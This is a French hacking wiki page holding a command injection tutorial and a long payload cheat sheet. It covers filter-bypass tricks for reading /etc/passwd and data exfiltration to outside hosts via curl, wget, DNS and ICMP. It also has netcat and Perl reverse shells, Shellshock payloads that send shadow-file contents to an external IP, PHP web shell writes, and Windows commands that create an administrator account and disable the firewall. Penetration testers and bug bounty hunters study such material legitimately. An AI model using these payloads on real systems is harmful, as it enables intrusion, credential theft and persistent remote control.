HackBBS - Contributions [fr]

Hacking:Bug bounties

2023-12-02T19:01:43Z

OldNeib :

* https://hackerone.com
* https://www.bugcrowd.com/
* https://www.intigriti.com/
* https://yeswehack.com/

Web:Injection de Commandes

2023-12-02T18:59:29Z

OldNeib : /* Windows */

Lors de l'exécution d'une commande en ligne prenant en paramètre une entrée utilisateur, il est parfois possible de s'évader du champ d'action prévu par l'ajout de certains caractères:
== Les Métacharacteres ==
; | Le point-virgule est le métacaractère le plus couramment utilisé pour tester une faille d'injection. Le shell exécute toutes les commandes séparées par le point-virgule.
& | Il sépare plusieurs commandes sur une ligne de commande. Il exécute la première commande puis la seconde.
&& | Si la commande précédente à && est réussie, alors seulement elle exécute la commande suivante.
| | Redirige les sorties standard de la première commande vers l'entrée standard de la deuxième commande.
|| | Le || n'exécute la commande suivante que si la commande précédente échoue.
`` | Le métacaractère "unquote" est utilisé pour forcer le shell à interpréter et à exécuter la commande à l'interieur. Ex: '$ Variable="OS version `uname -a`" && echo $variable'

Exemple simple de script PHP utilisant ping.
<?php
if(isset($_POST["ip"]) && !empty($_POST["ip"])){
$response = shell_exec("timeout 5 bash -c 'ping -c 3 ".$_POST["ip"]."'");
echo $response;
}
?>

Au lieu de fournir une ip, il est possible d'injecter une commade par l'utilisation des métacharacteres.
*127.0.0.1;ls -la
*;ls -la
*;ls%20-la
*;ls%09-la
*(...)

== Afficher le contenu d'un fichier PHP ==
L'injection de la commande ;php -s file.php va permettre d'afficher le contenu du fichier php plutôt que ;cat file.php qui risque lui d'être exécuté.

== Contournement de filtres ==
Si certain filtres sont en place, par exemple en supprimant les caractères d'évasion, on peut tenter un retour à la ligne via l'ajout de %0a.

La commande suivant le %0a sera alors exécutée.

=== Exemple de filtre maison ===
// Set blacklist
$substitutions = array(
'&' => '',
';' => '',
'| ' => '',
'-' => '',
'$' => '',
'(' => '',
')' => '',
'`' => '',
'||' => '',
);

On remarque le '| ', ce qui veut dire que le '|' n'est pas filtré s'il n'est pas suivi d'un espace. En y allant à taton on peut retrouver certaines règles.
*127.0;.0.1
*12&7.0.0.1
*(...)

Il est donc primordial de jouer avec les espaces!
*127.0.0.1|cat password.txt
*127.0.0.1 |cat password.txt
*127.0.0.1| cat password.txt
*(...)

Une commande possible serait donc:

127.0.0.1%0als -la

On peut se retrouver bloquer par l'encodage des caractères spéciaux via les formulaires web (127.0.0.1%250als -la), il semblerait que curl soit plus permissif, ou alors il faudrait modifier directement le header avant l'envoie de la requête.

=== Autre type de filtres ===
==== Double Encoding ====
Dans le cas oú l'on aurait quelque chose comme ça:

str_replace("%26", "")

On donc peut tenter un double encoding %%2626 deviendra alors %26.

==== Sans Espaces ====
Dans le cas oú les espaces serait supprimmés:

===== Le Bash Internal Field Separator: $IFS =====

;cat${IFS}/etc/passwd

===== SI IFS est blacklisté =====

;{cat,/etc/passwd}

===== Utilisation de TAB =====

;cat%09/etc/passwd

===== Line-Feed in the middle =====

;cat%0a/etc/passwd

===== Utilisation du '+' =====

;cat+/etc/passwd

===== Env Variable =====
;$var='x20';cat${var}/etc/passwd

===== Sans $ ni {} =====
;IFS=,;`cat<<</etc,/passwd`

==== Certains mots blacklistés ====
Si "cat" ou "passwd" ou "nimp" est blacklisté:

===== The Wildcard caracters =====

;/bin/cat /etc/passwd == ;/b*n/c /et*/pawd == ;/b?n/c?? /et?/pa??wd

===== Unitialized variable $u qui a une valeur nulle =====

;cat$u /etc$u/passwd

===== Null Variable =====

;cat /et``c/pas``swd
;cat /e$()tc/pa$()sswd
;cat /etc$(dlam)/pa$(erde)sswd

===== Troncation par quote, double quotes, ou backslash =====

;/bin/c"at" /e"tc"/pa"ss"wd
;/b'i'n/c'a't /e't'c/p'a's's'w'd'
;c\at /e\tc/pa\s\swd/

===== $@ =====
;c$@at /etc/passwd

==== Sans Slash ====
Si le slah est filtré on peut utilisé ${HOME:0;1} qui représente un slash:

;cat ${HOME:0;1}etc${HOME:0;1}passwd

==== ${SHELLOPTS} ====
De la même façon on peut utilisé ${SHELLOPTS} pour représenter un caractère spécifique:

${SHELLOPTS:3:1} représente un c.
${SHELLOPTS:2:1} représente un a.
(À creuser...)
;${SHELLOPTS:3:1}at /etc/p${SHELLOPTS:2:1}sswd

==== Reverse and Encode ====
;`echo "dwssap/cte/ tac | rev`
;$(echo Y2F0IC9ldGMvcGFzc3dkCg== | base64 -d)

==== Hexadecimal encode ====

;echo -e "x2fx65x74x63x2fx70x61x73x73x77x64" # (/etc/passwd)

== Cheat Sheet ==
=== Top 25 des paramètres pouvant conduire à une injection ===
?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

=== Fonctions PHP vulnérables ===
system()
exec()
shell_exec()
open()
pcntl_exec()
ioctl_exec()
eio_syncfs()
proc_open()
popen()

Command Execution Function Filtered possible Bypass with encoding
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
Reverse quotation marks are identical shell_exec()

=== DATA Exfiltration ===
Il est parfois possible de ne pas avoir de retour de la commande injectée, on peut alors passer par une requête POST et s'envoyer n'importe quel fichier. ([https://requestcatcher.com/])

==== cURL ====
$ curl -d "ip=127.0.0.1%0acurl -d"@Any_File" -X POST "https://requestbin.net/r/dyc3s5m8"" -X POST http://exemple.com/index.php
$ curl -d "@file" -X POST http://domain.com

==== cURL avec FTP ====
$ curl -T file ftp://ip -user nick:pass

==== Netcat ====
$ nc -l -p {port} < {file to extract}

==== ICMP ====
Si l'hôte que vous visez a été renforcé et que des outils tels que netcat, wget et CURL ont été supprimés, vous pouvez encore utiliser certaines techniques. Essayez de faire en sorte que l'hôte envoie un ping à votre boîte et voyez si le protocole ICMP passe à travers les pare-feux qui interviennent. Si c'est le cas, et que l'hôte sous-jacent tourne sous Linux, nous pouvons exfiltrer des données dans les requêtes ICMP en utilisant l'indicateur -p. L'option -p vous permet de spécifier jusqu'à 16 octets de "pad". C'est là que nous stockerons les données que nous voulons exfiltrer.

Nous devons d'abord convertir le fichier en hexadécimal, puis spécifier les données à insérer dans le paquet. Ceci peut être fait avec la ligne suivante :
cat password.txt | xxd -p -c 16 | while read exfile; do ping -p $exfile -c 1 xxx.xxx.xxx.xxx; done

Avec Wireshark, nous pouvons observer les paquets contenant nos données. Vous pouvez écrire un script qui récupère les paquets et réassemble le fichier sur l'hôte.

==== DNS ====
De la même manière que ping, DNS peut également être utilisé pour exfiltrer des données. Cette fois, nous allons utiliser chaque ligne de données comme nom d'hôte d'une requête DNS. En surveillant le trafic sur notre machine, nous pouvons réassembler le fichier. Dans ce cas, la commande suivante est soumise dans le cadre de notre requête au serveur vulnérable :
cat password.txt | while read exfile; do host $exfile.contextis.com xxx.xxx.xxx.xxx; done
for i in $(cat password.txt); do host $i.hkj.com; done

Comme pour le ping, vous pouvez écrire un script pour récupérer les paquets DNS entrants et réassembler le fichier.

==== Time based data exfiltration ====
Extraction caractère par caractère :
$ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
sys 0m0.000s

$ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real 0m0.002s
user 0m0.000s
sys 0m0.000s

==== Reverse Shell ====
Avec Netcat:
nc -L -p port -e cmd.exe (Windows)
nc -l -p port -e /bin/bash (*nix)

===== Se connecter =====
====== Netcat ======
$ nc {ip} {port}
$ nc {ip} {port} > output

(Windows)
type {file to extract} | nc -L -p {port}

====== wget ======
wget --post-data exfile=`cat /path/to/file` http://domain.com
wget --post-file file http://domain.com

====== Telnet ======
telnet ip port < file

=== Command Injection/Execution Cheat Sheet ===
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands

#Not execute but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
===== Unix =====




/index.html|id|
;id;
;id
;netstat -a;
;system('cat%20/etc/passwd')
;id;
|id
|/usr/bin/id
|id|
|/usr/bin/id|
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%0A/usr/bin/id%0A
%0Aid%0A
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=16?user=\`whoami\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=18?pwd=\`pwd\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=20?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=22?uname=\`uname -a\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=24?shell=\`nc -lvvp 1234 -e /bin/bash\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=26?shell=\`nc -lvvp 1236 -e /bin/bash &\`"
() { :;}; /bin/bash -c "curl http://135.23.158.130/.testing/shellshock.txt?vuln=5"
() { :;}; /bin/bash -c "sleep 1 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=1&?vuln=6"
() { :;}; /bin/bash -c "sleep 1 && echo vulnerable 1"
() { :;}; /bin/bash -c "sleep 3 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=3&?vuln=7"
() { :;}; /bin/bash -c "sleep 3 && echo vulnerable 3"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=6&?vuln=8"
() { :;}; /bin/bash -c "sleep 6 && curl http://135.23.158.130/.testing/shellshock.txt?sleep=9&?vuln=9"
() { :;}; /bin/bash -c "sleep 6 && echo vulnerable 6"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=17?user=\`whoami\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=19?pwd=\`pwd\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=21?shadow=\`grep root /etc/shadow\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=23?uname=\`uname -a\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=25?shell=\`nc -lvvp 1235 -e /bin/bash\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=27?shell=\`nc -lvvp 1237 -e /bin/bash &\`"
() { :;}; /bin/bash -c "wget http://135.23.158.130/.testing/shellshock.txt?vuln=4"
cat /etc/hosts
$(`cat /etc/passwd`)
cat /etc/passwd
%0Acat%20/etc/passwd
<nowiki>{{ get_user_file("/etc/passwd") }}</nowiki>



system('cat /etc/passwd');
<?php system("cat /etc/passwd");?>

===== Windows =====
`
||
|
;
'
'"
"
"'
&
&&
%0a
%0a%0d

%0Aid
%0a id %0a
%0Aid%0A
%0a ping -i 30 127.0.0.1 %0a
%0A/usr/bin/id
%0A/usr/bin/id%0A
%2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1
%20{${phpinfo()}}
%20{${sleep(20)}}
%20{${sleep(3)}}
a|id|
a;id|
a;id;
a;id\n
() { :;}; curl http://135.23.158.130/.testing/shellshock.txt?vuln=12
| curl http://crowdshield.com/.testing/rce.txt
& curl http://crowdshield.com/.testing/rce.txt
; curl https://crowdshield.com/.testing/rce_vuln.txt
&& curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
curl https://crowdshield.com/.testing/rce_vuln.txt ||`curl https://crowdshield.com/.testing/rce_vuln.txt` #' |curl https://crowdshield.com/.testing/rce_vuln.txt||`curl https://crowdshield.com/.testing/rce_vuln.txt` #\" |curl https://crowdshield.com/.testing/rce_vuln.txt
$(`curl https://crowdshield.com/.testing/rce_vuln.txt?req=22jjffjbn`)
dir
| dir
; dir
$(`dir`)
& dir
&&dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings\*
; dir C:\Documents and Settings\*
& dir C:\Documents and Settings\*
&& dir C:\Documents and Settings\*
dir C:\Documents and Settings\*
| dir C:\Users
; dir C:\Users
& dir C:\Users
&& dir C:\Users
dir C:\Users
;echo%20'<script>alert(1)</script>'
echo '<img src=https://crowdshield.com/.testing/xss.js onload=prompt(2) onerror=alert(3)></img>'// XXXXXXXXXXX
| echo "<?php include($_GET['page'])| ?>" > rfi.php
; echo "<?php include($_GET['page']); ?>" > rfi.php
& echo "<?php include($_GET['page']); ?>" > rfi.php
&& echo "<?php include($_GET['page']); ?>" > rfi.php
echo "<?php include($_GET['page']); ?>" > rfi.php
| echo "<?php system('dir $_GET['dir']')| ?>" > dir.php
; echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
&& echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
echo "<?php system('dir $_GET['dir']'); ?>" > dir.php
| echo "<?php system($_GET['cmd'])| ?>" > cmd.php
; echo "<?php system($_GET['cmd']); ?>" > cmd.php
& echo "<?php system($_GET['cmd']); ?>" > cmd.php
&& echo "<?php system($_GET['cmd']); ?>" > cmd.php
echo "<?php system($_GET['cmd']); ?>" > cmd.php
;echo '<script>alert(1)</script>'
echo '<script>alert(1)</script>'// XXXXXXXXXXX
echo '<script src=https://crowdshield.com/.testing/xss.js></script>'// XXXXXXXXXXX
| echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
; echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">;S");open(STDOUT,">;S");open(STDERR,">;S");exec("/bin/sh -i");};" > rev.pl
& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
&& echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
echo "use Socket;$i="192.168.16.151";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};" > rev.pl
() { :;}; echo vulnerable 10
eval('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
eval('ls')
eval('pwd')
eval('pwd');
eval('sleep 5')
eval('sleep 5');
eval('whoami')
eval('whoami');
exec('echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')
exec('ls')
exec('pwd')
exec('pwd');
exec('sleep 5')
exec('sleep 5');
exec('whoami')
exec('whoami');
;{$_GET["cmd"]}
`id`
|id
| id
;id
;id|
;id;
& id
&&id
;id\n
ifconfig
| ifconfig
; ifconfig
& ifconfig
&& ifconfig
/index.html|id|
ipconfig
| ipconfig /all
; ipconfig /all
& ipconfig /all
&& ipconfig /all
ipconfig /all
ls
$(`ls`)
| ls -l /
; ls -l /
& ls -l /
&& ls -l /
ls -l /
| ls -laR /etc
; ls -laR /etc
& ls -laR /etc
&& ls -laR /etc
| ls -laR /var/www
; ls -laR /var/www
& ls -laR /var/www
&& ls -laR /var/www
| ls -l /etc/
; ls -l /etc/
& ls -l /etc/
&& ls -l /etc/
ls -l /etc/
ls -lh /etc/
| ls -l /home/*
; ls -l /home/*
& ls -l /home/*
&& ls -l /home/*
ls -l /home/*
*; ls -lhtR /var/www/
| ls -l /tmp
; ls -l /tmp
& ls -l /tmp
&& ls -l /tmp
ls -l /tmp
| ls -l /var/www/*
; ls -l /var/www/*
& ls -l /var/www/*
&& ls -l /var/www/*
ls -l /var/www/*
\n
\n\033[2curl http://135.23.158.130/.testing/term_escape.txt?vuln=1?user=\`whoami\`
\n\033[2wget http://135.23.158.130/.testing/term_escape.txt?vuln=2?user=\`whoami\`
\n/bin/ls -al\n
| nc -lvvp 4444 -e /bin/sh|
; nc -lvvp 4444 -e /bin/sh;
& nc -lvvp 4444 -e /bin/sh&
&& nc -lvvp 4444 -e /bin/sh &
nc -lvvp 4444 -e /bin/sh
nc -lvvp 4445 -e /bin/sh &
nc -lvvp 4446 -e /bin/sh|
nc -lvvp 4447 -e /bin/sh;
nc -lvvp 4448 -e /bin/sh&
\necho INJECTX\nexit\n\033[2Acurl https://crowdshield.com/.testing/rce_vuln.txt\n
\necho INJECTX\nexit\n\033[2Asleep 5\n
\necho INJECTX\nexit\n\033[2Awget https://crowdshield.com/.testing/rce_vuln.txt\n
| net localgroup Administrators hacker /ADD
; net localgroup Administrators hacker /ADD
& net localgroup Administrators hacker /ADD
&& net localgroup Administrators hacker /ADD
net localgroup Administrators hacker /ADD
| netsh firewall set opmode disable
; netsh firewall set opmode disable
& netsh firewall set opmode disable
&& netsh firewall set opmode disable
netsh firewall set opmode disable
netstat
;netstat -a;
| netstat -an
; netstat -an
& netstat -an
&& netstat -an
netstat -an
| net user hacker Password1 /ADD
; net user hacker Password1 /ADD
& net user hacker Password1 /ADD
&& net user hacker Password1 /ADD
net user hacker Password1 /ADD
| net view
; net view
& net view
&& net view
net view
\nid|
\nid;
\nid\n
\n/usr/bin/id\n
perl -e 'print "X"x1024'
|| perl -e 'print "X"x16096'
| perl -e 'print "X"x16096'
; perl -e 'print "X"x16096'
& perl -e 'print "X"x16096'
&& perl -e 'print "X"x16096'
perl -e 'print "X"x16384'
; perl -e 'print "X"x2048'
& perl -e 'print "X"x2048'
&& perl -e 'print "X"x2048'
perl -e 'print "X"x2048'
|| perl -e 'print "X"x4096'
| perl -e 'print "X"x4096'
; perl -e 'print "X"x4096'
& perl -e 'print "X"x4096'
&& perl -e 'print "X"x4096'
perl -e 'print "X"x4096'
|| perl -e 'print "X"x8096'
| perl -e 'print "X"x8096'
; perl -e 'print "X"x8096'
&& perl -e 'print "X"x8096'
perl -e 'print "X"x8192'
perl -e 'print "X"x81920'
|| phpinfo()
| phpinfo()
{${phpinfo()}}
;phpinfo()
;phpinfo();//
';phpinfo();//
{${phpinfo()}}
& phpinfo()
&& phpinfo()
phpinfo()
phpinfo();
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("curl https://crowdshield.com/.testing/rce_vuln.txt?req=df2fkjj");?>
<?php system("echo XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX");?>
<?php system("sleep 10");?>
<?php system("sleep 5");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?method=phpsystem_get");?>
<?php system("wget https://crowdshield.com/.testing/rce_vuln.txt?req=jdfj2jc");?>
:phpversion();
`ping 127.0.0.1`
